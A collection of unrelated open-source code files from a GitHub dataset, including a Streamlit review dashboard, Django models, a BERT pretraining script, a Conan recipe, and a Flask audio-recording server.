{}\n","repo_name":"theMizza/fastapi_example","sub_path":"project/app/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33397718570","text":"from time import sleep\nfrom testing.test_unittest.test_base import FilerBaseTestCase\n\n\nclass FilterTestCase(FilerBaseTestCase):\n\n def testing_if_filter_exist(self):\n \"\"\"testing if exist filter button\"\"\"\n self.login_to_filer_block()\n self.get_filter_block()\n set_text = set(self.get_filter_block().text.split('\\n'))\n set_words = {'Partner preference', 'Building Info.', 'Buildings',\n 'Buildings with..', 'Structures', 'Pre-plans',\n 'Area(sq.ft.)', 'Clear', 'Sprinklered', 'Multi-family',\n 'Exclude Partner', 'Select Pre-plans', 'Vacant',\n 'Present', 'Standpipes', 'Within the Last 30 Days',\n 'Special', 'Older than a year', 'Apply', 'Fire Alarms',\n 'Commercial', 'Non-sprinklered', 'Not present',\n 'Select Building Info Option', 'Without pictures',\n 'Truss Roof', 'With pictures'}\n sleep(2)\n self.assertEquals(set_words, set_text)\n\n def testing_if_apply_and_clear_buttons_exist(self):\n \"\"\"testing if exist apply button\"\"\"\n self.login_to_filer_block()\n filter_block = self.selenium.find_element_by_class_name(\n 'form-group')\n set_text = set(filter_block.text.split('\\n'))\n set_words = {'Apply', 'Clear'}\n sleep(1)\n self.assertEquals(set_words, set_text)\n\n def testing_if_work_back_button(self):\n 
\"\"\"testing if back button hide page\"\"\"\n self.login_to_filer_block()\n self.get_filter_block()\n set_text = set(self.get_filter_block().text.split('\\n'))\n set_words = {'Partner preference', 'Building Info.', 'Buildings',\n 'Buildings with..', 'Structures', 'Pre-plans'}\n sleep(2)\n self.get_back_button().click()\n self.assertNotIn(set_words, set_text)\n","repo_name":"irynavaskiv1/flowmsp_web_test","sub_path":"testing/test_unittest/test_filters.py","file_name":"test_filters.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75258718651","text":"from dotenv import load_dotenv\nfrom os import getenv\nfrom setuptools import setup, find_packages\n \nload_dotenv()\n\nEMAIL = getenv(\"EMAIL\")\nAUTHOR = getenv(\"AUTHOR\")\n \nsetup(\n name = \"py_lava_api\",\n version = \"0.1.0\",\n keywords = (\"lava\", ),\n description = \"Simple work with lava\",\n long_description = \"Simple work with lava\",\n license = \"MIT Licence\",\n \n url = \"https://github.com/DephPhascow/py_lava_api\",\n author = AUTHOR,\n author_email = EMAIL,\n \n packages = find_packages(),\n include_package_data = True,\n platforms = \"any\",\n install_requires = [\"requests\"]\n)","repo_name":"DephPhascow/py_lava_api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"869100695","text":"import pandas as pd\nimport numpy as np\nimport shap\nimport streamlit as st\nimport streamlit.components.v1 as components\nimport plotly.graph_objects as go\nfrom plotly import tools\nimport plotly.offline as py\nfrom pkg_summarize.summarize import extract_summary\nfrom pkg_keyword.keyword import extract\nfrom pkg_sentiment.sentiment import get_sentiment\nfrom pkg_preprocess.preprocess import clean_data\nimport plotly.express as px\n\nst.set_page_config(page_title=\"Analytics Dashboard\", layout=\"wide\")\nst.markdown(\"## Analytics Dashboard\")\n\ncol1, buffer, col2 = st.columns([3, 1, 3])\n\ndata = col2.expander('Data View')\nconfig = col1.expander(\"Configuration\")\ndetail_view = config.checkbox('Detailed View')\npre_load = config.checkbox('Preloaded Data')\n\ndf = pd.read_csv(r\"Downloads\\G2_ringcentral-video.csv\")\n\ndata.dataframe(df)\n\ndf[\"review\"] = df[\"Pros\"] + df[\"Cons\"]\n\nif not detail_view:\n df[\"Rating\"] = df[\"Rating\"].astype(int)\n df[\"Rating\"] = df[\"Rating\"].replace(0, 1)\n\ndf_neg = df[df[\"Rating\"] <= 3][[\"Rating\", \"review\"]]\ndf_neu = df[(df[\"Rating\"] > 3) & (df[\"Rating\"] < 4)][[\"Rating\", \"review\"]]\ndf_pos = df[df[\"Rating\"] >= 4][[\"Rating\", \"review\"]]\n\nfig1 = px.pie(df, values=\"Rating\", names=\"Rating\")\n\nfig1.update_layout(\n title=\"Ringcentral Rating Distribution\")\ncol1.plotly_chart(fig1)\n\n# col2.markdown(\"### Positive review summary\")\npos_doc = clean_data(df_pos)\nneg_doc = clean_data(df_neg)\n\npos_keyword = extract(pos_doc)\nneg_keyword = extract(neg_doc)\n\nneg_keyword_ = [(x, -100 * y) for x, y in neg_keyword]\npos_keyword_ = [(x, 100 * y) for x, y in pos_keyword]\n\nkey = pd.concat([pd.DataFrame(pos_keyword_), pd.DataFrame(neg_keyword_)])\nkey = key.reset_index(drop=True)\n\nkey[\"key_phrase\"] = key[0]\nkey[\"score\"] = key[1]\ndel key[1]\ndel key[0]\n\nfig2 = go.Figure()\n\ncategory_order = list(key[\"key_phrase\"].unique())\n\nfig2.add_trace(go.Bar(\n x=key[\"score\"],\n y=key[\"key_phrase\"],\n 
orientation='h',\n marker_color=key[\"score\"]\n))\n\nfig2.update_layout(\n barmode='relative',\n title=\"Ringcentral Key Features\"\n)\n\ncol1.plotly_chart(fig2)\n\npos_doc_text = \". \".join(pos_doc)\nneg_doc_text = \". \".join(neg_doc)\n\ncol2.subheader(\"Positive review summary\")\n# col2.caption(extract_summary(pos_doc_text))\ncol2.caption(\n \"Able to conduct team-building meetings remotely some employees are more comfortable with Ringcentral as opposed \"\n \"to other providers/apps . I love that the 'dashboard is simple and easy to use It really helps some of the older \"\n \"people I work with who are a little unenthusiastic about ZOOM . I like that its all tied into one platform with \"\n \"ring central calling .\")\n\ncol2.subheader(\"Negative review summary\")\n# col2.caption(extract_summary(neg_doc_text))\ncol2.caption(\"If you join from the browser, it 's almost unuseable. The lag was awful it had an echo and the camera \"\n \"stopped working. .There are often glitches in the program where it turns voices into sounding robotic \"\n \"does n't allow a screen share. Platform feels dated and clunky Admin portal is difficult to navigate \"\n \"Video conferencing sessions frequently lag glitch or do not work as expected.\")","repo_name":"ashutoshraj/review_analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37726184182","text":"def main(): # pragma: no cover\n from brian2 import start_scope, mvolt, ms, NeuronGroup, StateMonitor, run\n import matplotlib.pyplot as plt\n import neo\n import quantities as pq\n\n start_scope()\n\n # Izhikevich neuron parameters.\n a = 0.02 / ms\n b = 0.2 / ms\n c = -65 * mvolt\n d = 6 * mvolt / ms\n I = 4 * mvolt / ms\n\n # Standard Izhikevich neuron equations.\n eqs = \"\"\"\n dv/dt = 0.04*v**2/(ms*mvolt) + (5/ms)*v + 140*mvolt/ms - u + I : volt\n du/dt = a*((b*v) - u) : volt/second\n \"\"\"\n\n reset = \"\"\"\n v = c\n u += d\n \"\"\"\n\n # Setup and run simulation.\n G = NeuronGroup(1, eqs, threshold='v>30*mvolt', reset='v = -70*mvolt')\n G.v = -65 * mvolt\n G.u = b * G.v\n M = StateMonitor(G, 'v', record=True)\n run(300 * ms)\n\n # Store results in neo format.\n vm = neo.core.AnalogSignal(M.v[0], units=pq.V, sampling_period=0.1 * pq.ms)\n\n # Plot results.\n plt.figure()\n plt.plot(vm.times * 1000, vm * 1000) # Plot mV and ms instead of V and s.\n plt.xlabel('Time (ms)')\n plt.ylabel('mv')\n\n # Save results.\n iom = neo.io.PyNNNumpyIO('spike_extraction_test_data')\n block = neo.core.Block()\n segment = neo.core.Segment()\n segment.analogsignals.append(vm)\n block.segments.append(segment)\n iom.write(block)\n\n # Load results.\n iom2 = neo.io.PyNNNumpyIO('spike_extraction_test_data.npz')\n data = iom2.read()\n vm = data[0].segments[0].analogsignals[0]\n\n # Plot results.\n # The two figures should match.\n plt.figure()\n plt.plot(vm.times * 1000, vm * 1000) # Plot mV and ms instead of V and s.\n plt.xlabel('Time (ms)')\n plt.ylabel('mv')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NeuralEnsemble/elephant","sub_path":"elephant/test/make_spike_extraction_test_data.py","file_name":"make_spike_extraction_test_data.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"78"} +{"seq_id":"72153964732","text":"from conans import ConanFile, CMake, tools\nfrom conans.tools import download, unzip, os_info\nfrom 
distutils.dir_util import copy_tree\nimport os\nimport shutil\nimport multiprocessing\n\n# http://gainput.johanneskuhlmann.de/api/page_building.html\nclass GainputConan(ConanFile):\n name = \"gainput\"\n version = \"master\"\n description = \"Conan package for gainput.\"\n url = \"https://github.com/jkuhlmann/gainput\"\n license = \"MIT\"\n settings = \"arch\", \"build_type\", \"compiler\", \"os\"\n generators = \"cmake\"\n exports_sources = \"lib/source/*\"\n options = {\n \"shared\": [True, False],\n \"gainput_debug\": [True, False],\n \"gainput_dev\": [True, False],\n \"gainput_enable_recorder\": [True, False],\n \"gainput_lib_build\": [True, False]\n }\n default_options = \\\n \"shared=False\", \\\n \"gainput_debug=False\", \\\n \"gainput_dev=False\", \\\n \"gainput_enable_recorder=False\", \\\n \"gainput_lib_build=True\",\n\n def source(self):\n self.run(\"git clone git://github.com/jkuhlmann/gainput.git\")\n\n def build(self):\n cmake = CMake(self)\n #if self.options.shared:\n # cmake.definitions[\"GAINPUT_BUILD_STATIC\"] = \"OFF\"\n #else:\n # cmake.definitions[\"GAINPUT_BUILD_SHARED\"] = \"OFF\"\n if self.options.gainput_debug:\n cmake.definitions[\"GAINPUT_DEBUG\"] = \"ON\"\n if self.options.gainput_dev:\n cmake.definitions[\"GAINPUT_DEV\"] = \"ON\"\n if self.options.gainput_enable_recorder:\n cmake.definitions[\"GAINPUT_ENABLE_RECORDER\"] = \"ON\"\n if self.options.gainput_lib_build:\n cmake.definitions[\"GAINPUT_LIB_BUILD\"] = \"ON\"\n cmake.configure(source_folder=\"gainput\")\n cmake.build()\n\n def collect_headers(self, include_folder):\n self.copy(\"*.h\" , dst=\"include\", src=include_folder)\n self.copy(\"*.hpp\", dst=\"include\", src=include_folder)\n self.copy(\"*.inl\", dst=\"include\", src=include_folder)\n\n def package(self):\n self.collect_headers(\"gainput/lib/include\")\n self.copy(\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"*.dylib*\", dst=\"lib\", keep_path=False)\n self.copy(\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = [\"gainput\"]\n","repo_name":"DrewCarlson/conan-gainput","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38296649665","text":"import numpy as np\nfrom typing import List\n\nfrom channest.heights import LayerHeights\n\n\nclass LayerHeightPlot:\n def __init__(self):\n import plotly.graph_objs as go\n self._f = go.Figure()\n self._f.layout.xaxis.range = (-0.5, 15.0)\n self._f.layout.xaxis.title = 'Thickness (m)'\n self._f.layout.yaxis.title = 'Sampled Layer #'\n self._f.layout.title = 'Channel Thickness Estimates'\n self._f.layout.hovermode = 'y'\n self._f.layout.legend.font.family = 'monospace'\n\n def add_heights(self,\n heights: List[LayerHeights],\n suffix: str):\n # Calculate statistics: mean, median, max, modes\n values = [h.flat_values() for h in heights]\n values = [v if v.size > 0 else np.zeros(1) for v in values] # Transform to make stats calculations easier\n means = np.array([np.mean(v) for v in values])\n medians = np.array([np.median(v) for v in values])\n maxs = np.array([np.max(v) for v in values])\n ys = np.arange(means.size)\n self._f.add_scatter(\n x=means,\n y=ys,\n mode='lines+markers',\n name='Mean ' + suffix\n )\n self._f.add_scatter(\n x=medians,\n y=ys,\n mode='lines+markers',\n name='Median ' + suffix\n )\n 
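The `np.zeros(1)` substitution a few lines up exists because NumPy's reductions misbehave on empty arrays: `np.mean` returns `nan` with a RuntimeWarning and `np.max` raises outright. A minimal sketch of the edge case the sentinel avoids:

```python
import numpy as np

empty = np.array([])
safe = empty if empty.size > 0 else np.zeros(1)  # the sentinel trick used above

print(np.mean(safe), np.max(safe))  # 0.0 0.0 -- both well defined
# By contrast, np.max(empty) raises ValueError ("zero-size array to reduction
# operation") and np.mean(empty) returns nan and emits a RuntimeWarning.
```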
self._f.add_scatter(\n x=maxs,\n y=ys,\n mode='markers+lines',\n marker=dict(\n color='#000',\n ),\n name='Max. ' + suffix\n )\n h_max = LayerHeights.calculate_max_height(heights)\n main_modes = np.array([h.flat_values_max_mode(h_max) for h in heights])\n self._f.add_scatter(\n x=np.where(np.isnan(main_modes), 0, main_modes),\n y=ys,\n mode='markers+lines',\n marker=dict(\n color='#f90'\n ),\n name='Main mode ' + suffix\n )\n th = 0.01\n max_circle = max(400 / len(heights), 15)\n for i_layer, layer in enumerate(heights):\n kde_modes = layer.flat_values_kde_modes(h_max)\n x_points = np.insert(kde_modes[0], [0, kde_modes[0].size], [0, maxs[i_layer]])\n y_points = np.insert(kde_modes[1], [0, kde_modes[1].size], [0, 0])\n self._f.add_scatter(\n x=x_points,\n y=[i_layer] * x_points.size,\n mode='lines+markers',\n marker=dict(\n color='#0c0',\n # Hide small entries by setting size to 0:\n size=np.where(y_points > th, 5 + y_points * (max_circle - 5), 0),\n line=dict(width=2, color='#000')\n ),\n text=[f'Layer #: {i_layer}
    Peak: {p:2.2f}'\n for t, p in zip(x_points, y_points)],\n name='Modes ' + suffix,\n legendgroup='Modes',\n showlegend=i_layer == 0,\n )\n\n def write(self, fn):\n self._f.write_html(fn + '.html', include_plotlyjs='cdn')\n","repo_name":"NorskRegnesentral/channest","sub_path":"channest/qc/layerheightplot.py","file_name":"layerheightplot.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17275472636","text":"\nmapping = {\n'Four_of_a_Kind': 7,\n'Full_House': 6,\n'Straight': 5,\n'Three_of_a_Kind': 4,\n'Two_pairs': 3,\n'One_pairs': 2,\n'Sum_of_Cards': 1\n}\n\nname2value = ['_', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K', 'A']\n\n\nfrom collections import Counter\ndef whatkind(allcards):\n allcards = [name2value.index(c) for c in allcards]\n c = Counter(allcards)\n max_times = max(c.values())\n if max_times == 4:\n return 'Four_of_a_Kind'\n elif max_times == 3:\n # full house\n if len(c.keys()) == 2:\n return\n\ndef texasHoldem(common, a, b):\n pass\n","repo_name":"shubham25namdeo/Leetcode","sub_path":"unsolved/texas-poker-game.py","file_name":"texas-poker-game.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"29708924193","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.urls import reverse\n\n# Create your models here.\nDepart_Class = [\n ('اﻷول', 'اﻷول'),\n ('الثاني ', 'الثاني '),\n ('الثالث', 'الثالث'),\n ('الرابع', 'الرابع'),\n ('الخامس', 'الخامس'),\n ('السادس', 'السادس'),\n ('السابع', 'السابع'),\n ('الثامن', 'الثامن'),\n ('التاسع', 'التاسع'),\n ('العاشر', 'العاشر'),\n]\n\nSECTION = [('1', '1'), ('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'),\n ('6', '6'), ('7', '7')]\n\nSYSTEM = [('نظام سنوي', ' نظام سنوي'), ('نظام الفصول', 'نظام الفصول')]\n\nSTUDY_YEARS = [\n ('2 سنوات', '2 سنوات'),\n ('3 سنوات', '3 سنوات'),\n ('4 سنوات', '4 سنوات'),\n ('5 سنوات', '5 سنوات'),\n]\n\n\nclass College(models.Model):\n CLtitle = models.CharField(max_length=200, verbose_name=_('اسم الكلية'))\n CLdescrip = models.TextField(max_length=1000, verbose_name=_('وصف الكلية'))\n CLdepart = models.CharField(max_length=200,\n choices=SECTION,\n verbose_name=_(\"عدد الأقسام\"))\n\n def get_absolute_url(self):\n return reverse('college:college_detail', kwargs={'id': self.id})\n\n def __str__(self):\n return self.CLtitle\n\n\nclass Department(models.Model):\n Dcollege = models.ForeignKey('College',\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n verbose_name=_(\"الكلية\"))\n Dtitle = models.CharField(max_length=200, verbose_name=_(\"القسم\"))\n Dsystem = models.CharField(max_length=200,\n choices=SYSTEM,\n verbose_name=_(\"نظام الدراسة\"))\n\n def __str__(self):\n return self.Dtitle\n\n\nclass Book(models.Model):\n Btitle = models.CharField(max_length=200, verbose_name=_(\"عنوان الكتاب\"))\n pdf = models.FileField(upload_to='media/pdf', null=True, blank=True)\n Bcollge = models.ForeignKey('College',\n on_delete=models.CASCADE,\n verbose_name=_(\"الكلية\"))\n Bdepart = models.ForeignKey('Department',\n on_delete=models.CASCADE,\n verbose_name=_(\"القسم\"))\n Bclass = models.CharField(max_length=20,\n choices=Depart_Class,\n verbose_name=_(\"الفصل الدراسي\"))\n Bdescrip = models.TextField(max_length=200, verbose_name=_(\"Desciption\"))\n\n def __str__(self):\n return self.Btitle\n\n\nclass Branch(models.Model):\n BRtitle = 
models.CharField(max_length=200, verbose_name=_('الفرع'))\n BRImg = models.ImageField(upload_to='static/img/branchs',\n verbose_name=_('الصورة'))\n BRdescrip = models.TextField(max_length=1000, verbose_name=_('وصف الفرع'))\n\n def __str__(self):\n return self.BRtitle\n","repo_name":"Abubakar-hamad/django-books-uni","sub_path":"college/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71432116732","text":"import json\nimport logging\nfrom pathlib import Path\n\nfrom transformers.tokenization_bert import BertTokenizer\n\nfrom farm.data_handler.data_silo import StreamingDataSilo\nfrom farm.data_handler.processor import BertStyleLMProcessor\nfrom farm.modeling.adaptive_model import AdaptiveModel\nfrom farm.modeling.language_model import LanguageModel\nfrom farm.modeling.optimization import initialize_optimizer\nfrom farm.modeling.prediction_head import BertLMHead, NextSentenceHead\nfrom farm.train import Trainer\nfrom farm.utils import set_all_seeds, MLFlowLogger, initialize_device_settings\n\n\ndef train_from_scratch(args):\n logging.basicConfig(\n format=\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\",\n datefmt=\"%m/%d/%Y %H:%M:%S\",\n level=logging.INFO,\n )\n\n ml_logger = MLFlowLogger(tracking_uri=args.get(\"mlflow_tracking_uri\", \"file:/opt/ml/model/mlflow\"))\n ml_logger.init_experiment(experiment_name=\"train_from_scratch\", run_name=\"run\")\n\n set_all_seeds(seed=39)\n device, n_gpu = initialize_device_settings(use_cuda=True)\n evaluate_every = int(args[\"evaluate_every\"])\n\n save_dir = Path(\"/opt/ml/model\")\n data_dir = Path(\"/opt/ml/input/data/input_channel\")\n\n # 1.Create a tokenizer\n tokenizer = BertTokenizer(data_dir/args[\"vocab_file\"], do_lower_case=args[\"do_lower_case\"])\n\n # 2. Create a DataProcessor that handles all the conversion from raw text into a PyTorch Dataset\n processor = BertStyleLMProcessor(\n data_dir=data_dir,\n tokenizer=tokenizer, max_seq_len=int(args[\"max_seq_len\"]),\n train_filename=args[\"train_file\"],\n dev_filename=args.get(\"dev_file\", None),\n test_filename=args.get(\"test_file\", None),\n )\n\n # 3. Create a DataSilo that loads several datasets (train/dev/test), provides DataLoaders for them and\n # calculates a few descriptive statistics of our datasets\n stream_data_silo = StreamingDataSilo(processor=processor, batch_size=int(args[\"batch_size\"]))\n\n # 4. Create an AdaptiveModel\n # a) which consists of a pretrained language model as a basis\n language_model = LanguageModel.from_scratch(\"bert\", tokenizer.vocab_size)\n\n # b) and *two* prediction heads on top that are suited for our task => Language Model finetuning\n lm_prediction_head = BertLMHead(768, tokenizer.vocab_size)\n next_sentence_head = NextSentenceHead([768, 2], task_name=\"nextsentence\")\n\n model = AdaptiveModel(\n language_model=language_model,\n prediction_heads=[lm_prediction_head, next_sentence_head],\n embeds_dropout_prob=0.1,\n lm_output_types=[\"per_token\", \"per_sequence\"],\n device=device,\n )\n\n # 5. 
Create an optimizer\n model, optimizer, lr_schedule = initialize_optimizer(\n model=model,\n learning_rate=float(args[\"learning_rate\"]),\n schedule_opts={\"name\": \"LinearWarmup\", \"warmup_proportion\": float(args[\"warmup_proportion\"])},\n n_batches=len(stream_data_silo.get_data_loader(\"train\")),\n n_epochs=int(args[\"n_epochs\"]),\n device=device,\n grad_acc_steps=int(args[\"gradient_accumulation_steps\"]),\n )\n\n # 6. Feed everything to the Trainer, which keeps care of growing our model and evaluates it from time to time\n if args.get(\"checkpoint_every\"):\n checkpoint_every = int(args[\"checkpoint_every\"])\n checkpoint_root_dir = Path(\"/opt/ml/checkpoints/training\")\n else:\n checkpoint_every = None\n checkpoint_root_dir = None\n\n trainer = Trainer.create_or_load_checkpoint(\n model=model,\n optimizer=optimizer,\n data_silo=stream_data_silo,\n epochs=int(args[\"n_epochs\"]),\n n_gpu=n_gpu,\n lr_schedule=lr_schedule,\n evaluate_every=evaluate_every,\n device=device,\n grad_acc_steps=int(args[\"gradient_accumulation_steps\"]),\n checkpoint_every=checkpoint_every,\n checkpoint_root_dir=checkpoint_root_dir,\n )\n # 7. Let it grow! Watch the tracked metrics live on the public mlflow server: https://public-mlflow.deepset.ai\n trainer.train()\n\n # 8. Hooray! You have a model. Store it:\n model.save(save_dir)\n processor.save(save_dir)\n\n\nif __name__ == \"__main__\":\n with open(\"/opt/ml/input/config/hyperparameters.json\") as f:\n params = json.load(f)\n logging.info(f\"Starting a train job with parameters {params}\")\n train_from_scratch(params)\n","repo_name":"julian-risch/PatentMatch-FARM","sub_path":"examples/train_from_scratch_with_sagemaker.py","file_name":"train_from_scratch_with_sagemaker.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"3714093115","text":"from abc import ABC\nfrom typing import Any, Optional\nfrom pip_services4_components.context import IContext\n\nfrom .RestClient import RestClient\n\n\nclass CommandableHttpClient(RestClient, ABC):\n \"\"\"\n Abstract client that calls commandable HTTP service.\n Commandable controller are generated automatically for ICommandable objects. Each command is exposed as POST operation that receives all parameters in body object.\n\n ### Configuration parameters ###\n - base_route: base route for remote URI\n - connection(s):\n - discovery_key: (optional) a key to retrieve the connection from IDiscovery\n - protocol: connection protocol: http or https\n - host: host name or IP address\n - port: port number\n - uri: resource URI or connection string with all parameters in it\n - options:\n - retries: number of retries (default: 3)\n - connect_timeout: connection timeout in milliseconds (default: 10 sec)\n - timeout: invocation timeout in milliseconds (default: 10 sec)\n\n ### References ###\n - `*:logger:*:*:1.0` (optional) :class:`ILogger ` components to pass log messages\n - `*:counters:*:*:1.0` (optional) :class:`ICounters ` components to pass collected measurements\n - `*:discovery:*:*:1.0` (optional) :class:`IDiscovery ` controller to resolve connection\n\n Example:\n \n .. 
code-block:: python\n\n class MyCommandableHttpClient(CommandableHttpClient, IMyClient):\n # ...\n\n def get_data(self, context, id):\n return self.call_command(\"get_data\", context, MyData(id))\n\n # ...\n\n client = MyCommandableHttpClient()\n client.configure(ConfigParams.from_tuples(\"connection.protocol\", \"http\",\n \"connection.host\", \"localhost\",\n \"connection.port\", 8080))\n data = client.getData(\"123\", \"1\")\n # ...\n \"\"\"\n\n def __init__(self, base_route: str):\n \"\"\"\n Creates a new instance of the client.\n\n :param base_route: a base route for remote service.\n \"\"\"\n super(CommandableHttpClient, self).__init__()\n self._base_route = base_route\n\n def call_command(self, name: str, context: Optional[IContext], params: Any) -> Any:\n \"\"\"\n Calls a remote method via HTTP commadable protocol. The call is made via POST operation and all parameters are sent in body object. The complete route to remote method is defined as baseRoute + \"/\" + name.\n\n :param name: a name of the command to call.\n\n :param context: (optional) transaction id to trace execution through call chain.\n\n :param params: command parameters.\n\n :return: result of the command.\n \"\"\"\n timing = self._instrument(context, self._base_route + '.' + name)\n try:\n # route = self.__fix_route(self._base_route) + self.__fix_route(name)\n # if self._base_route and self._base_route[0] != '/':\n # route = '/' + self._base_route + '/' + name\n # else:\n # route = self._base_route + '/' + name\n return self._call('POST', name, context, None, params)\n except Exception as err:\n timing.end_failure(err)\n raise err\n finally:\n timing.end_timing()\n","repo_name":"pip-services4/pip-services4-python","sub_path":"pip-services4-http-python/pip_services4_http/clients/CommandableHttpClient.py","file_name":"CommandableHttpClient.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14360263081","text":"from flask import Flask, render_template\r\nimport wave\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport numpy as np\r\nfrom scipy import signal\r\nimport scipy.io.wavfile as wav\r\nimport sounddevice as sd\r\nimport os\r\nfrom os.path import exists\r\n\r\napp = Flask(__name__)\r\n\r\nduration = 10 # recording duration in seconds\r\nfs = 44100 # sampling frequency\r\nchannels = 1 # number of channels\r\n\r\ndef record_audio(filename):\r\n print(\"Recording started\")\r\n myrecording = sd.rec(int(duration * fs), samplerate=fs,\r\n channels=channels, dtype='int16')\r\n sd.wait() # Wait until recording is finished\r\n print(\"Recording stopped\")\r\n wav.write(os.path.join(\"static\", filename), fs, \r\n myrecording) # Save the recording to a file\r\n\r\ndef waveform():\r\n obj = wave.open('static/recorded_audio.wav', 'rb')\r\n sample_freq = obj.getframerate()\r\n n_samples = obj.getnframes()\r\n signal_wave = obj.readframes(-1)\r\n duration = n_samples/sample_freq\r\n signal_array = np.frombuffer(signal_wave, dtype=np.int16)\r\n time = np.linspace(0, duration, num=n_samples)\r\n\r\n plt.figure(figsize=(15, 5))\r\n plt.plot(time, signal_array)\r\n plt.title('Audio Plot')\r\n plt.ylabel('signal wave')\r\n plt.xlabel('time (s)')\r\n plt.xlim(0, duration)\r\n plt.savefig('static/waveform.png') # Save the waveform \r\n # plot to a file\r\n plt.close()\r\n\r\ndef spectrogram():\r\n obj = wave.open('static/recorded_audio.wav', 'rb')\r\n sample_freq = obj.getframerate()\r\n 
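Both plotting helpers in this record decode raw frames with `np.frombuffer`; the dtype must match the WAV's sample width (here 16-bit PCM), and multi-channel audio arrives interleaved. A standalone sketch of just the decode step, assuming a hypothetical 16-bit file `example.wav`:

```python
import wave
import numpy as np

with wave.open("example.wav", "rb") as wav:  # hypothetical input file
    n_channels = wav.getnchannels()
    frames = wav.readframes(wav.getnframes())

samples = np.frombuffer(frames, dtype=np.int16)  # 2 bytes per sample
if n_channels > 1:
    samples = samples.reshape(-1, n_channels)  # un-interleave L/R columns
print(samples.shape)
```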
n_samples = obj.getnframes()\r\n signal_wave = obj.readframes(-1)\r\n duration = n_samples/sample_freq\r\n signal_array = np.frombuffer(signal_wave, dtype=np.int16)\r\n\r\n # Compute the spectrogram\r\n window = signal.get_window('hamming', 1024)\r\n f, t, Sxx = signal.spectrogram(signal_array, sample_freq, \r\n window=window, nperseg=1024, noverlap=512, mode='magnitude')\r\n\r\n # Plot the spectrogram\r\n plt.figure(figsize=(15, 5))\r\n plt.pcolormesh(t, f, 20 * np.log10(Sxx), cmap='inferno')\r\n plt.ylim(0, 22050) # Limit the y axis to frequencies below\r\n # 22050 Hz\r\n plt.xlabel('Time (s)')\r\n plt.ylabel('Frequency (Hz)')\r\n plt.title('Spectrogram')\r\n plt.colorbar()\r\n plt.savefig('static/spectrogram.png') # Save the \r\n # spectrogram plot to a file\r\n plt.close()\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/record')\r\ndef record():\r\n path1 = \"/home/pi/Desktop/server/static/recorded_audio.wav\"\r\n path2 = \"/home/pi/Desktop/server/static/spectrogram.png\"\r\n path3 = \"/home/pi/Desktop/server/static/waveform.png\"\r\n\r\n if (os.path.exists(path1) or os.path.exists(path2) or \r\n os.path.exists(path3)):\r\n os.remove(path1)\r\n os.remove(path2)\r\n os.remove(path3)\r\n else:\r\n pass\r\n\r\n record_audio('recorded_audio.wav')\r\n waveform()\r\n spectrogram()\r\n return render_template('recording.html')\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='0.0.0.0', port=5000)\r\n","repo_name":"serrvictor/STUDY-AND-DESIGN-OF-AN-INTERFACE-FOR-REMOTE-AUDIO-PROCESSING","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70922658491","text":"def find_minimum(a,k):\n min = a[0]\n max = a[0]\n\n for j in range (1,len(a)):\n if min > a[j]:\n min = a[j]\n if max < a[j]:\n max = a[j]\n if k <=1:\n return min\n if k >= len(a):\n return max\n for i in range (2,k+1):\n ith_min = max\n for j in range(len(a)):\n if a[j] < ith_min and a[j] > min:\n ith_min = a[j]\n min =ith_min\n print(i)\n print(ith_min)\n print(\"---\")\n return ith_min\n\na=[3,5,1,10,7,22,15,19,6,8,16]\nk =6\n\nprint(find_minimum(a,k))","repo_name":"JowettC/IS1702-CT","sub_path":"week 2/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13718512398","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis setup logic is highly inspired to the one used in `https://github.com/shellcheck-py/shellcheck-py`.\n\nAfter `https://github.com/editorconfig-checker/editorconfig-checker.python/issues/15` was opened,\nwe decided to move the wrapper logic 